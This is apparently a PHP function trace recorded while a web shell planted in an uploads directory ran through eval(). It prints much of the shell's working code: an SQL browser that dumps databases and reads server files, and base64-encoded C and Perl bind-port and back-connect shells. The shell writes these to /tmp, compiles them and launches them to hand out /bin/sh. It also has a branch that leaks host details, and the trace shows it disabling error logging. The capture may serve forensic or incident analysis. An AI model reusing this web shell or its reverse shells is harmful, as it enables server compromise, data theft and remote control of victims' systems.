false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM \'".addslashes($str)."\';select file from hard2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table hard2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n                    if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n                    $i = 0;\r\n                    $head = true;\r\n\t\t\t\t\twhile($▟ = $this->fetch()) {\r\n                        $sql = \'\';\r\n                        if($i % 1000 == 0) {\r\n                            $head = true;\r\n                            $sql = ";\\n\\n";\r\n                        }\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($▟ as $k=>$v) {\r\n                            if($v === null)\r\n                                $▟[$k] = "NULL";\r\n                            elseif(is_int($v))\r\n                                $▟[$k] = $v;\r\n                            else\r\n                                $▟[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n                        if($head) {\r\n                            $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $▟).\')\';\r\n                            $head = false;\r\n                        } else\r\n                            $sql .= "\\n\\t,(".implode(", ", $▟).\')\';\r\n                        if($fp) fwrite($fp, $sql); else echo($sql);\r\n                        $i++;\r\n\t\t\t\t\t}\r\n                    if(!$head)\r\n                        if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($▟ = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($▟ as $k=>$v) {\r\n\t\t\t\t\t\t\t$▟[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n                        $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $▟).\');\'."\\n";\r\n                        if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n        switch($_POST[\'charset\']) {\r\n            case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n            case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n            case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n            case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n            case "cp866": $db->setCharset(\'cp866\'); break;\r\n        }\r\n        if(empty($_POST[\'file\'])) {\r\n            ob_start("ob_gzhandler", 4096);\r\n            header("Content-Disposition: attachment; filename=dump.sql");\r\n            header("Content-Type: text/plain");\r\n            foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n            exit;\r\n        } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n            foreach($_POST[\'tbl\'] as $v)\r\n                $db->dump($v, $fp);\r\n            fclose($fp);\r\n            unset($_POST[\'p2\']);\r\n        } else\r\n            die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\r\n\t}\r\n\thardHeader();\r\n\techo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=ne value=\'\'><input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\r\n<td><label><select name=\'type\'><option value=\'mysql\' ";\r\n    if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho ">MySql</option><option value=\'pgsql\' ";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho ">PostgreSql</option></select></label></td>\r\n<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\r\n<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\r\n<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\" required></td><td>";\r\n\t$tmp = "<input type=text name=sql_base value=\'\'>";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "<label><select name=sql_base><option value=\'\'></option>";\r\n\t\t\twhile($▟ = $db->fetch()) {\r\n\t\t\t\tlist($key, $value) = each($▟);\r\n\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n\t\t\t}\r\n\t\t\techo \'</select></label>\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo "</td>\r\n\t\t\t\t<td><input type=submit value=\'submit\' onclick=\'fs(d.sf);\'></td>\r\n                <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n            s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\r\n            function fs(f) {\r\n                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n                    if(f.p1) f.p1.value=\'\';\r\n                    if(f.p2) f.p2.value=\'\';\r\n                    if(f.p3) f.p3.value=\'\';\r\n                }\r\n            }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = \'select\';\r\n\t\t\t\td.sf.p2.value = t;\r\n                if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($▟ = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($▟);\r\n                    if(!empty($_POST[\'sql_count\']))\r\n                        $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;<a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\'&nbsp;\':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=submit value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n                    $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n                    echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\r\n                    echo " of $pages";\r\n                    if($_POST[\'p3\'] > 1)\r\n                        echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>&lt; Prev</a>";\r\n                    if($_POST[\'p3\'] < $pages)\r\n                        echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next &gt;</a>";\r\n                    $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "<br><br>";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main>\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($▟ = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'<tr>\';\r\n\t\t\t\t\t\t\t\tforeach($▟ as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t\t\t\treset($▟);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'</tr><tr>\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($▟ as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'</table>\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\r\n                if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n                    echo htmlspecialchars($_POST[\'p2\']);\r\n                echo "</textarea><br/><input type=submit value=\'Execute\'>";\r\n\t\t\t\techo "</td></tr>";\r\n\t\t\t}\r\n\t\t\techo "</table></form><br/>";\r\n            if($_POST[\'type\']==\'mysql\') {\r\n                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n                if($db->fetch())\r\n                    echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input  class=\'toolsInp\' type=text name=f><input type=submit value=\'submit\'></form>";\r\n            }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n\t\t\t}\r\n\t} else {\r\n        echo htmlspecialchars($db->error());\r\n    }\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionNetwork() {\r\n\thardHeader();\r\n\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "<h1>Network tools</h1><div class=content>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.port.value,this.pass.value);return false;\'>\r\n\t<span>Bind port to /bin/sh</span><br/>\r\n\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> Password: <input type=\'text\' name=\'pass\'> Using: <label><select name=\'using\'><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select></label> <input type=submit value=\'submit\'>\r\n\t</form>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.server.value,this.port.value);return false;\'>\r\n\t<span>Back-connect to</span><br/>\r\n\tServer: <input type=\'text\' name=\'server\' value=". $_SERVER[\'REMOTE_ADDR\'] ."> Port: <input type=\'text\' name=\'port\' value=\'31337\'> Using: <label><select name=\'using\'><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select></label> <input type=submit value=\'submit\'>\r\n\t</form><br>";\r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w)\t{\r\n\t\t\t\t@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpc\') {\r\n\t\t\tcf("/tmp/bp.c",$bind_port_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n\t\t\t@unlink("/tmp/bp.c");\r\n\t\t\t$▖ .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcc\') {\r\n\t\t\tcf("/tmp/bc.c",$back_connect_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n\t\t\t@unlink("/tmp/bc.c");\r\n\t\t\t$▖ .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";\r\n\t\t}\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nif( empty($_POST[\'a\']) ){\r\n\tif(isset($▚) && function_exists(\'action\' . $▚)){\r\n\t\t$_POST[\'a\'] = $▚;}\r\n\telse{\r\n\t\t$_POST[\'a\'] = \'FilesMan\'; } }\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ){\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);}\r\n\t\r\n}else {\r\n    $ziwziw = $_POST[\'lynx\'];\r\n    if ($ziwziw == \'adding\') {\r\n        echo php_uname();\r\n        echo \'sarafinoubombom\';\r\n    } else if ($ziwziw == \'ip\') {\r\n        //$ip = file_get_contents("http://ipecho.net/plain");\r\n        $ip = $_SERVER[\'SERVER_ADDR\'];\r\n        if (filter_var($ip, FILTER_VALIDATE_IP)) {\r\n            echo $ip;\r\n            echo \'sarafinoubombom\';\r\n        } else {\r\n            $host = gethostname();\r\n            $ip = gethostbyname($host);\r\n            echo $ip;\r\n            echo \'sarafinoubombom\';\r\n        }\r\n    }\r\n} '	/var/www/html/uploads/hahaha.php	1	0
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	3	$▛ = ''
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	4	$▘ = TRUE
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	5	$▜ = 'UTF-8'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	6	$▚ = 'FilesMan'
3	11	0	0.013115	1514328	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	7	1	'python-requests/2.25.1'
3	11	1	0.013132	1514424
3	11	R			'ecd862b3d0595af0a0b03f511e800938'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	7	$▙ = 'ecd862b3d0595af0a0b03f511e800938'
3	12	0	0.013161	1514392	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	12	1	'localhost'
3	12	1	0.013175	1514488
3	12	R			'421aa90e079fa326b6494f812ad13e79'
3	13	0	0.013192	1514392	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	13	1	'localhost'
3	13	1	0.013206	1514488
3	13	R			'421aa90e079fa326b6494f812ad13e79'
3	14	0	0.013221	1514456	prototype	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	13	2	'421aa90e079fa326b6494f812ad13e79key'	'ecd862b3d0595af0a0b03f511e800938'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	10	_COOKIE['421aa90e079fa326b6494f812ad13e79key'] = 'ecd862b3d0595af0a0b03f511e800938'
4	15	0	0.013254	1514832	setcookie	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	10	2	'421aa90e079fa326b6494f812ad13e79key'	'ecd862b3d0595af0a0b03f511e800938'
4	15	1	0.013273	1515032
4	15	R			TRUE
3	14	1	0.013287	1514968
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	16	_POST['charset'] = 'UTF-8'
3	16	0	0.013310	1515344	ini_set	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	25	2	'error_log'	NULL
3	16	1	0.013326	1515416
3	16	R			''
3	17	0	0.013340	1515344	ini_set	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	26	2	'log_errors'	0
3	17	1	0.013355	1515416
3	17	R			'1'
3	18	0	0.013368	1515344	ini_set	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	27	2	'max_execution_time'	0
3	18	1	0.013384	1515448
3	18	R			'30'
3	19	0	0.013397	1515344	set_time_limit	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	28	1	0
3	19	1	0.013411	1515408
3	19	R			FALSE
3	20	0	0.013425	1515376	define	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	31	2	'VERSION'	'4.2.5'
3	20	1	0.013439	1515480
3	20	R			TRUE
3	21	0	0.013452	1515408	get_magic_quotes_gpc	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	32	0
3	21	1	0.013466	1515408
3	21	R			FALSE
3	22	0	0.013479	1515408	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	46	1	'localhost'
3	22	1	0.013493	1515504
3	22	R			'421aa90e079fa326b6494f812ad13e79'
3	23	0	0.013508	1515408	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	47	1	'localhost'
3	23	1	0.013525	1515504
3	23	R			'421aa90e079fa326b6494f812ad13e79'
